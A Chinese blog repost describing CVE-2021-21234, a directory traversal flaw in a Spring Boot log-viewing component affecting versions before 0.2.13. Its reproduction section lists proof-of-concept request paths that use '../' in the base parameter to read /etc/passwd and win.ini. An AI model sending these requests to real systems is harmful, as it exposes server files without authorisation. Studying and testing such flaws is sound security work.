热门标签
热门文章
- 1MVC、CURD、ORM、OOP、ActiveRecord、单一入口
- 2Git_git机器学习
- 3python创建型设计模式学习——工厂方法模式_创建型设计模式工厂方法模式python代码解析
- 4智谱GLM-4-9B,超越Llama3,多模态媲美GPT4V(附:内部培训资源)_lamma模型与智谱对比
- 5分享两道阿里P7究极难度算法题,Java开发者必看_tcc 如果出现网络连不通怎么办?xa 的一致性如何保证?
- 6学习c语言第十五题_1.使用scanf函数获取控制台上输入的整数,利用条件运算符的嵌套来完成此题:学习成
- 7智能配置运维系统开发工具链_系统功能配置链
- 8面向对象第一章_定义一个食物类food,该类有一属性,即名称 name,定义 showinfo()方法,以便打印显示
- 9flink的实时数据同步_flink 实时同步
- 10动手为王 | Oracle 数据库跨版本升级迁移实践
当前位置: article > 正文
Spring Boot 目录遍历 (CVE-2021-21234)_springboot-cve-2021-21234
作者:秋刀鱼在做梦 | 2024-08-21 06:24:52
赞
踩
springboot-cve-2021-21234
一、漏洞概述
Spring Boot 虽然检查了文件名参数以防止目录遍历攻击(因此filename=../somefile 将不起作用),但没有充分检查基本文件夹参数,因此filename=somefile&base=../ 可以访问日志记录目录之外的文件)。
二、影响范围
0.2.13之前
三、访问页面
四、漏洞复现
- # Windows
- /manage/log/view?filename=/windows/win.ini&base=../../../../../
-
- # linux
- /manage/log/view?filename=/etc/passwd&base=../../../../../
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/秋刀鱼在做梦/article/detail/1010532
推荐阅读
相关标签
